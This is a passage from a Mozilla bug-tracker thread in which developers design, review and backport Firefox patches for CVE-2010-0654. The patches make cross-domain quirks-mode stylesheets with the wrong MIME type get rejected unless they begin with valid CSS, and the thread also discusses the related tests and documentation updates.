Here's an implementation of the "valid first initial construct" heuristic for 1.9.2, and I think it would be straightforward to backport to 1.9.1 as well, assuming the CSSLoader is more or less the same there.

Instead of modifying nsCSSParser, I wrote a second mini-parser that just answers the yes-no question "does the first thing in this string smell like CSS?"  based on the css2.1 "generic" grammar plus some bits of css3-selectors.  [The "generic" grammar by itself would do us no good, as its laxity is what got us into this mess in the first place!]  It's in the file nsCSSCheckInitialSyntax.cpp, and its API is one function:

  bool mozilla::CSS::InitialSyntaxIsValid(const nsAString& sheet);

To make this work I had to modify the CSSLoader so that it consumes the entire input stream in SheetLoadData::OnStreamComplete, and then hands a string rather than an nsIUnicharInputStream to the parser.  This *might* have performance implications, but note that we were already waiting to run the real parser until all the data came off the network, anyway.  And I want to make the same change on trunk so that I can do lazy computation of file position for error messages (but that's blocked on my deCOM patches, still waiting for review IIRC).

I need some advice on how I can test the mini-parser more thoroughly.  It is hardly ever invoked from the normal code paths, so a standalone xpcom unit test makes most sense to me, but I don't really know how to write those.
Attachment #420591 - Flags: review?(dbaron)
Probably the easiest way to write tests for it is to expose a function on something that calls it (maybe DOMWindowUtils) and then write the tests as mochitests.
blocking1.9.1: ? → needed
blocking2.0: --- → ?
(In reply to comment #53)
> Probably the easiest way to write tests for it is to expose a function on
> something that calls it (maybe DOMWindowUtils) and then write the tests as
> mochitests.

I like that idea.  Here's a revised patch with more tests for the parser, and several parser bugs fixed that the tests found.  I assume that for a branch patch I should be adding to nsDOMWindowUtils_1_9_2 rather than nsDOMWindowUtils.
Attachment #420591 - Attachment is obsolete: true
Attachment #420842 - Flags: review?(dbaron)
Attachment #420591 - Flags: review?(dbaron)
blocking2.0: ? → alpha1
Priority: -- → P1
An alternative heuristic occurred to me last week.  Detecting "this *is* CSS" is hard, because the selector syntax is very sloppy, but detecting "this *isn't* CSS" is easy for the cases we care about, and could be done in OnDetermineCharset without reading the entire sheet into memory, thus would be less invasive.  I think this sniffing algorithm would cover everything interesting: decode to Unicode, skip any initial sequence of ASCII whitespace, then blacklist if the next 16 characters include a control character other than whitespace (U+0000-0008, U+000E-001F, U+007F-009F) or the first characters after the whitespace are

 <    (HTML or XML)
 {    (JSON)
 %!   (PDF/PS)
 #!   (Unix-type script)
 !<   (Unix 'ar' archive)

The "next eight characters include a control character" rule covers nearly all the image, video, audio, compressed, and machine-code formats I know about.  The big thing this can't catch is plain-text structured data with no magic number, such as JavaScript and CSV files.

The big reason *not* to do this, IMO, is that it's seriously inconsistent with what's been put into Webkit.
Alias: CVE-2010-0654
blocking1.9.2: --- → ?
status1.9.2: --- → ?
Flags: blocking1.9.0.19?
blocking1.9.2: ? → needed
Flags: blocking1.9.0.19? → blocking1.9.0.19-
Comment on attachment 420842 [details] [diff] [review]
1.9.2 branch patch (with heuristic) v2: more tests, bugs fixed

at a face-to-face meeting we agreed to do this differently.  Stay tuned.
Attachment #420842 - Flags: review?(dbaron)
Whether this ends up being a heuristic or some specific logic, please let the CSSWG know so it can be specified (or if they refuse to do it, let me know and I'll do it in HTML5 instead, though that would be inappropriate given @import).
(In reply to comment #4)
> Therefore, the solution devised was:
> - Reject a CSS load if all of these are met:
> a) It is cross-domain load (making sure a redirect does not confuse the domain
> check)!
> b) Not a valid MIME type (text/css, application/x-unknown-content-type or
> empty).
> c) The alleged CSS does not start with a syntactically valid CSS construct.
> 
> The above rules will block the attack because an HTML, XML etc. header will
> always cause a broken first CSS descriptor.


(In reply to comment #55)
> An alternative heuristic occurred to me last week.  Detecting "this *is* CSS"
> is hard, because the selector syntax is very sloppy, but detecting "this
> *isn't* CSS" is easy for the cases we care about, and could be done in
> OnDetermineCharset without reading the entire sheet into memory, thus would be
> less invasive.  I think this sniffing algorithm would cover everything
> interesting: decode to Unicode, skip any initial sequence of ASCII whitespace,
> then blacklist if the next 16 characters include a control character other than
> whitespace (U+0000-0008, U+000E-001F, U+007F-009F) or the first characters
> after the whitespace are
> 
>  <    (HTML or XML)

"<!--" is a valid CSS construct. I think it's even a fairly common first construct in external style sheets on the Web, but I don't have numbers at hand.

"<!--" is a valid CSS construct. (I think it's also a fairly common first
construct in external style sheets on the Web, but I don't have numbers at
hand.)
(In reply to comment #57)
> Whether this ends up being a heuristic or some specific logic, please let the
> CSSWG know so it can be specified (or if they refuse to do it, let me know and
> I'll do it in HTML5 instead, though that would be inappropriate given @import).

We intend any heuristic to be a stopgap for Firefox 3.6, and not to be standardized; the behavior in 3.7 and subsequent will be that the quirk rule at the end of HTML5 4.12.3.14 (Link type "stylesheet") is not applied for cross-domain loads.  In other words, even in quirks mode, a cross-domain stylesheet must be served as text/css, or without a Content-Type, to be applied.  That looks like a straightforward change on your end.

dbaron probably knows better than me, but I don't see anything relevant specified in CSS at present.  I think maybe CSS should just say that @import behaves the same as a link to an external stylesheet resource from the non-CSS document at the root of the @import chain.

(In reply to comment #58)
> "<!--" is a valid CSS construct. I think it's even a fairly common first
> construct in external style sheets on the Web, but I don't have numbers at
> hand.

That's unfortunate; "<!--" is only a valid CSS construct for the sake of backward compatibility of *inline* style sheets with antediluvian browsers that don't understand the <style> tag.  There's no good reason for it ever to appear in an external style sheet.  Is it possible for you to get those numbers?
From what I gather after reading all this, the main documentation issue here is to mention that CSS won't be loaded cross-domain anymore if the MIME type isn't text/css? There's actually more going on than that, but that seems to be the main thing to mention, as well as perhaps that the syntax of CSS documents is checked a little more thoroughly than before. I don't really think specifics are needed.
(In reply to comment #60)
> From what I gather after reading all this, the main documentation issue here is
> to mention that CSS won't be loaded cross-domain anymore if the MIME type isn't
> text/css? There's actually more going on than that, but that seems to be the
> main thing to mention, as well as perhaps that the syntax of CSS documents is
> checked a little more thoroughly than before. I don't really think specifics
> are needed.

Yes, I think the documentation's position should be "serve CSS as text/css, and serve other things with their correct MIME types too".

Also, be very clear that this is only about quirks mode documents.  Standards mode documents have always enforced the correct MIME type on CSS.  Quirks mode documents will, going forward, require the correct MIME type on style loaded cross-domain.  There may be a backward compatibility heuristic added to 3.6 but it will only be for 3.6.
Will there be a particular sub-version of Gecko that has this fix? Will I be able to say that this will affect "Gecko 1.9.2.x"?
At any rate, I've added text on this subject here:

https://developer.mozilla.org/en/Properly_Configuring_Server_MIME_Types#Why_are_correct_MIME_types_important.3f

This note needs to be updated once we know specifically what version of Firefox & Gecko it applies to.
Safari 4.0.5 contains a fix, hopefully the same as Chrome's.  See CVE-2010-0051 on http://support.apple.com/kb/HT4070.
At the platform meeting ... two months ago already? geez, I'm slow ... dbaron asked that the 1.9.2 patch be rewritten to not involve a new miniparser on the side.  This I have now done.

Upside: no new miniparser, no need to slurp the entire style sheet before processing, no mucking around in xpcom/io.  Overall, considerably less invasive (a surprise to me, as the whole point of the miniparser was to make the patch less invasive).

Downside: easiest seen by looking at the changes to test_css_cross_domain_miniparser.html (which I did not bother renaming) -- because we're using the real parser, the first selector in the file must be semantically meaningful to this version of Gecko, not just well-formed.  That could potentially break a site that was in quirks mode, with a cross-domain style sheet, with the wrong MIME type, and the very first thing in that sheet was a shiny bleeding edge CSS selector that 1.9.2 doesn't recognize.

I leave it to product management to decide whether this is a better tradeoff than the previous patch had.

I also beefed up the error console diagnostics -- they distinguish cross-domain from non-cross-domain quirks mode style sheet loads, and if we bail out on the style sheet because of a syntax error, we say so.  This means string changes, unfortunately.

Will post links to try server builds when they complete.
Attachment #420842 - Attachment is obsolete: true
Attachment #438197 - Flags: review?(dbaron)
Attachment #438197 - Flags: approval1.9.2.4?
A few issues from skimming:
 * you can't make l10n changes on the branch (css.properties)
 * I'd prefer if the new DOMWindowUtils function checked for UniversalXPConnect just like most of the other DOMWindowUtils methods; your test can enable that trivially
 * I think it would be better to avoid modifying nsICSSParser; it's relatively avoidable (at worst, add nsICSSParser_MOZILLA_1_9_2_BRANCH)

I'd somewhat prefer to review a patch addressing those issues than going into a detailed review of this one.
(In reply to comment #66)
> A few issues from skimming:
>  * you can't make l10n changes on the branch (css.properties)

Is there no way around this?  Outreach to people who need to fix their websites will be a lot easier if the diagnostics are clear.

>  * I'd prefer if the new DOMWindowUtils function checked for UniversalXPConnect
> just like most of the other DOMWindowUtils methods; your test can enable that
> trivially

Ok

>  * I think it would be better to avoid modifying nsICSSParser; it's relatively
> avoidable (at worst, add nsICSSParser_MOZILLA_1_9_2_BRANCH)

I can't add methods to an XPCOM interface without bumping the IID, right?  So the only thing that comes to mind is sticking the bit into nsCSSStyleSheet and letting the parser know that all nsICSSStyleSheets are nsCSSStyleSheets.  Is that going to cause some other problem somewhere?

> I'd somewhat prefer to review a patch addressing those issues than going into a
> detailed review of this one.

Sure (but it won't be till Monday, regardless).
(In reply to comment #67)
> >  * I think it would be better to avoid modifying nsICSSParser; it's relatively
> > avoidable (at worst, add nsICSSParser_MOZILLA_1_9_2_BRANCH)
> 
> I can't add methods to an XPCOM interface without bumping the IID, right?  So
> the only thing that comes to mind is sticking the bit into nsCSSStyleSheet and
> letting the parser know that all nsICSSStyleSheets are nsCSSStyleSheets.  Is
> that going to cause some other problem somewhere?

If you add nsICSSParser_MOZILLA_1_9_2_BRANCH : public nsICSSParser, add a new method (and leave the old one with the old behavior... the implementation just calls the new one), and make the caller that needs the method QI to nsICSSParser_MOZILLA_1_9_2_BRANCH instead of nsICSSParser, you should be fine.

> Sure (but it won't be till Monday, regardless).

FWIW, I'll be mostly-unreachable next week.
(In reply to comment #67)
> Is there no way around this?  Outreach to people who need to fix their websites
> will be a lot easier if the diagnostics are clear.

English-only messages are a possibility.
Attachment #438197 - Flags: approval1.9.2.4?
This revision adds nsICSSParser_1_9_2, doesn't touch css.properties, and has the DOMWindowUtils hook check for UniversalXPConnect privileges.

The new nsICSSParser_1_9_2 method always does the check, and nsCSSLoader only QIs for that method when it needs the check done; this is just to minimize overhead.  SheetLoadData::ReportMimeProblem got a lot uglier, but I think it's the best that can be done given the l10n constraints.  (It's unfortunate that nsContentUtils does not have a ReportToConsole variant that takes the actual string to log rather than the localization tag.)
Attachment #438197 - Attachment is obsolete: true
Attachment #438558 - Flags: review?(dbaron)
Attachment #438558 - Flags: approval1.9.2.4?
Attached patch 1.9.2 patch backported to 1.9.1 (obsolete) — Splinter Review
This is the same as attachment 438558 [details] [diff] [review] but for 1.9.1. It builds, but I'm unfortunately not able to run the mochitests.
Attachment #439488 - Flags: review?
Attachment #439488 - Flags: review? → review?(dbaron)
Comment on attachment 438558 [details] [diff] [review]
1.9.2 branch patch with dbaron's high-level changes made

Moving nomination flag to 1.9.2.5 - don't think we want to mix this with OOPP, already doing enough this release :)
Attachment #438558 - Flags: approval1.9.2.4? → approval1.9.2.5?
Comment on attachment 438558 [details] [diff] [review]
1.9.2 branch patch with dbaron's high-level changes made

>+    if (mLoader->mCompatMode == eCompatibility_NavQuirks) {
>+      problem = MimeProblem_quirksload;
>+      if (mLoaderPrincipal) {
>+        PRBool subsumed;
>+        result = mLoaderPrincipal->Subsumes(principal, &subsumed);
>+        if (NS_FAILED(result) || !subsumed) {
>+          problem = MimeProblem_quirksload_xd;
>+          mCheckInitialSyntax = PR_TRUE;
>+        }
>+      }
>+    }

Is this the right handling of null mLoaderPrincipal, or should we assume
that that means cross-domain?  (Is this a case of null == system
principal?)



>-      NS_ASSERTION(aLinkingContent, "Inline stylesheet without linking content?");
>-      baseURI = aLinkingContent->GetBaseURI();
>-      sheetURI = aLinkingContent->GetDocument()->GetDocumentURI();
>-      originalURI = nsnull;
>-    } else {
>+        NS_ASSERTION(aLinkingContent, "Inline stylesheet without linking content?");
>+        baseURI = aLinkingContent->GetBaseURI();
>+        sheetURI = aLinkingContent->GetDocument()->GetDocumentURI();
>+        originalURI = nsnull;
>+      } else {

No need to reindent (or tabify, or whatever this is).

>+  rv = errObj->Init(formattedMessage.get(),
>+                    NS_ConvertUTF8toUTF16(referrer).get(),
>+                    nsnull, 0, 0, errorFlag, "CSS Loader");

Is EmptyString().get() better than nsnull?



Instead of changing SkipAtRule() to return false, I'd prefer if
you made its return type void and changed its callers to return
false in the two relevant locations.

I'd suggest also changing ParsePageRule to |return PR_TRUE|, with a
comment explaining that it's a temporary change just for the purpose of
this, so that we accept style sheets that start with @page.  (And add a
test for that case?)


r=dbaron with that
Attachment #438558 - Flags: review?(dbaron) → review+
Comment on attachment 439488 [details] [diff] [review]
1.9.2 patch backported to 1.9.1

Please redo the backport based on the new patch, *once it is revised to address the comments I just made*.  (And, in general, please don't request review on a backport for a patch that hasn't been reviewed yet; it just artificially increases apparent review load.)
Attachment #439488 - Flags: review?(dbaron) → review-
(In reply to comment #74)
> (From update of attachment 438558 [details] [diff] [review])
> >+    if (mLoader->mCompatMode == eCompatibility_NavQuirks) {
> >+      problem = MimeProblem_quirksload;
> >+      if (mLoaderPrincipal) {
> >+        PRBool subsumed;
> >+        result = mLoaderPrincipal->Subsumes(principal, &subsumed);
> >+        if (NS_FAILED(result) || !subsumed) {
> >+          problem = MimeProblem_quirksload_xd;
> >+          mCheckInitialSyntax = PR_TRUE;
> >+        }
> >+      }
> >+    }
> 
> Is this the right handling of null mLoaderPrincipal, or should we assume
> that that means cross-domain?  (Is this a case of null == system
> principal?)

I'm not familiar with any rules for when a null nsIPrincipal* pointer means the system principal and when it doesn't, but LoadSheet skips a CheckMayLoad call if mLoaderPrincipal is null, so that seems like it's supposed to mean the system principal in this context.  Also, it appears to me that mLoaderPrincipal will be null at this point only if a null origin principal was passed to InternalLoadNonDocumentSheet, which is only accessible to C++ as far as I can tell.

mLoaderPrincipal is also null for SheetLoadData objects created by LoadInlineStyle, but that code path goes directly to ParseSheet without calling OnStreamComplete, and the loader for child sheets always uses the sheet principal (== the node principal for the <style> tag, in this case).  And it's null for SheetLoadData objects created by PostLoadEvent, but it appears to me that that is only used for sheets which have already been loaded, and so will not come back to OnStreamComplete.

> No need to reindent (or tabify, or whatever this is).

That appears to have been me fatfingering the indentation there.  Fixed.

> >+  rv = errObj->Init(formattedMessage.get(),
> >+                    NS_ConvertUTF8toUTF16(referrer).get(),
> >+                    nsnull, 0, 0, errorFlag, "CSS Loader");
> 
> Is EmptyString().get() better than nsnull?

It comes to the same thing, since ultimately whatever we provide here is passed to the PRUnichar* overload of nsString::Assign(), which treats null as the empty string, but with a comment reading "unfortunately some callers pass null :-(", so maybe it should be changed to EmptyString().get() even though it's functionally equivalent - up to you.

> Instead of changing SkipAtRule() to return false, I'd prefer if
> you made its return type void and changed its callers to return
> false in the two relevant locations.

Done.

> I'd suggest also changing ParsePageRule to |return PR_TRUE|, with a
> comment explaining that it's a temporary change just for the purpose of
> this, so that we accept style sheets that start with @page.  (And add a
> test for that case?)

Done.

Tangential question: it occurs to me that we should, perhaps, make trunk do this heuristic for the case of an absent Content-Type header, since that officially does mean "sniff", and sites that leave HTML content untagged would still be vulnerable to this attack if we blindly assume untagged is good CSS (as we currently do on trunk).  On the other hand, that does mean we're stuck with the heuristic going forward; but it's not nearly so ugly as it was the first time around (and would be less ugly still on trunk, where I can change interfaces and strings ;)  What do you think?

I'll update the 1.9.1 backport.  Do we need a 1.9.0 backport still?
mLoaderPrincipal == null means we don't plan to use it or that the loader is system.  LoadInlineStyle should perhaps set the principal to that of the element just for consistency and we should document the meaning of null on the member.  My apologies for not having done that originally....
(In reply to comment #76)
> Tangential question: it occurs to me that we should, perhaps, make trunk do
> this heuristic for the case of an absent Content-Type header, since that
> officially does mean "sniff", and sites that leave HTML content untagged would
> still be vulnerable to this attack if we blindly assume untagged is good CSS
> (as we currently do on trunk).  On the other hand, that does mean we're stuck
> with the heuristic going forward; but it's not nearly so ugly as it was the
> first time around (and would be less ugly still on trunk, where I can change
> interfaces and strings ;)  What do you think?

I don't think so.

Either:

 (a) Unlabeled is supported, in which case we shouldn't inflict on it the horrible forwards-compatibility implications of this approach, or

 (b) Unlabeled is unspported, in which case we should move towards rejecting it always.
Comment on attachment 438558 [details] [diff] [review]
1.9.2 branch patch with dbaron's high-level changes made

a=LegNeato for 1.9.2.5. Please ONLY land this on mozilla-1.9.2 default, as we
are still working on 1.9.2.4 on the relbranch
Attachment #438558 - Flags: approval1.9.2.5? → approval1.9.2.5+
http://hg.mozilla.org/releases/mozilla-1.9.2/rev/17391b64e790

With the changes indicated in comment 76.  Landed on mozilla-1.9.2 default only, as per comment 79.  1.9.1 backport to follow.
Attachment #438558 - Attachment is obsolete: true
Attachment #439488 - Attachment is obsolete: true
Keywords: relnote
Whiteboard: [sg:moderate][3.6.x] → [sg:moderate][3.5.x]
This might or might not need separate review but I am marking it for review anyway out of an abundance of caution.  Most of the differences from the 1.9.2 version have to do with ns(I)DOMWindowUtils not being in the same place on this branch.

I renamed all the _1_9_2 interfaces to _1_9_1, but I used the same UUID for nsICSSParser_1_9_1 on this branch as for nsICSSParser_1_9_2 on the 1.9.2 branch since the duck type is the same.  nsIDOMWindowUtils_1_9_1 does *not* have the same duck type so it gets a new UUID.  Please let me know if this is the wrong approach.
Attachment #447120 - Flags: review?(dbaron)
Attachment #447120 - Flags: approval1.9.1.11?
Attachment #447120 - Flags: approval1.9.1.10?
Comment on attachment 447120 [details] [diff] [review]
1.9.1 backport of as-landed 1.9.2 patch

r=dbaron

It would definitely be good to get this in in the 1.9.1 release matching the 1.9.2 release that has it.
Attachment #447120 - Flags: review?(dbaron) → review+
Comment on attachment 447120 [details] [diff] [review]
1.9.1 backport of as-landed 1.9.2 patch

a=beltzner for 1.9.1.11, please land on mozilla-1.9.2 default
Attachment #447120 - Flags: approval1.9.1.11?
Attachment #447120 - Flags: approval1.9.1.11+
Attachment #447120 - Flags: approval1.9.1.10?
(In reply to comment #83)
> (From update of attachment 447120 [details] [diff] [review])
> a=beltzner for 1.9.1.11, please land on mozilla-1.9.2 default

Errr - mozilla-1.9.1 default
http://hg.mozilla.org/releases/mozilla-1.9.1/rev/09eee2c3794f
Whiteboard: [sg:moderate][3.5.x] → [sg:moderate]
(In reply to comment #86)
> Documentation updated:
> 
> https://developer.mozilla.org/en/Incorrect_MIME_Type_for_CSS_Files
> https://developer.mozilla.org/en/Properly_Configuring_Server_MIME_Types

You documented the trunk behavior as if it applied to 3.5 and 3.6 as well, but that's not quite right.  3.5 and 3.6, to avoid breaking quite so many sites, will content-sniff a cross-domain load with the wrong MIME type and reject it only if the first thing in the file appears not to be a valid CSS construct.  Firefox 4 *will* just reject the load regardless of contents, though.
Ah! OK, that was unclear from the many comments here. I've updated those articles now.
Still not quite right, I'm afraid.  All of these changes only apply for *cross origin* stylesheet loads.  Quirks mode loads of same-origin stylesheets are same as they ever were, trunk and branches both.
Marking as verified for 1.9.1 and 1.9.2 based on passing checked in tests for this.
Attached patch 1.9.0 backport (obsolete) — Splinter Review
This is the backport I did for a Debian stable update.
Attachment #459893 - Flags: review?(dbaron)
I'm not familiar enough with code that old to criticize your backport in detail, Mike, but I'll mention a couple of high-level issues.

+      formattedMessage.AppendLiteral("  This cross-domain request will be "
+                                     "ignored by the next major release of "
+                                     "this browser.");

This diagnostic is going to be confusing coming from ff3.0.  Please change to something like "ignored by Gecko 1.9.3 (e.g. Firefox 4.0)".

+++ b/layout/style/test/ccd-standards.html

This test is unreliable if you don't also backport bug 536603.
(Gecko 1.9.3 was renamed to Gecko 2.0.)
(In reply to comment #92)
> I'm not familiar enough with code that old to criticize your backport in
> detail, Mike, but I'll mention a couple of high-level issues.
> 
> +      formattedMessage.AppendLiteral("  This cross-domain request will be "
> +                                     "ignored by the next major release of "
> +                                     "this browser.");
> 
> This diagnostic is going to be confusing coming from ff3.0.  Please change to
> something like "ignored by Gecko 1.9.3 (e.g. Firefox 4.0)".

Fair enough, but please note that I backported the patch from ff3.5... which means ff3.5 says the same.
Comment on attachment 459893 [details] [diff] [review]
1.9.0 backport

> PRBool CSSParserImpl::ParsePageRule(nsresult& aErrorCode, RuleAppendFunc aAppendFunc, void* aData)
> {
>-  // XXX not yet implemented

Don't remove the "XXX not yet implemented" comment; it wasn't
removed in the original.

It looks like your patch dropped the three deletes of empty files
layout/style/test/redirect-{1,2,3}.css .  Is that a git quirk?  Please make
sure they get CVS removed if they're supposed to be removed.

r=dbaron with that fixed, though I can't really say I remember what's
different about the CSS parser since 1.9.

Please make sure that all layout/style/test mochitests pass before you land.
Attachment #459893 - Flags: review?(dbaron) → review+
That said, I really don't see why you want to backport this to 1.9.0; I think there are many much-more-serious security bugs that are unfixed on that (unsupported) branch.  I'd prefer leaving it alone.
(In reply to comment #95)
> It looks like your patch dropped the three deletes of empty files
> layout/style/test/redirect-{1,2,3}.css .  Is that a git quirk?  Please make
> sure they get CVS removed if they're supposed to be removed.

Looks like a quirk from when I applied the patch on my local tree.

> r=dbaron with that fixed, though I can't really say I remember what's
> different about the CSS parser since 1.9.
> 
> Please make sure that all layout/style/test mochitests pass before you land.

I did.

(In reply to comment #96)
> That said, I really don't see why you want to backport this to 1.9.0; I think
> there are many much-more-serious security bugs that are unfixed on that
> (unsupported) branch.  I'd prefer leaving it alone.

Debian is still supporting the 3.0 code base. I have backported all security fixes that affect 3.0 (except the Math.random one), but most of the time there is no need to modify the patches. Only in these cases I send the modified patch for review and to possibly avoid to someone else doing the work again.
Attached patch 1.9.0 backportSplinter Review
Addressed dbaron's comments, and modified warning message per comment 92.
Attachment #459893 - Attachment is obsolete: true
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Created:
Updated:
Size: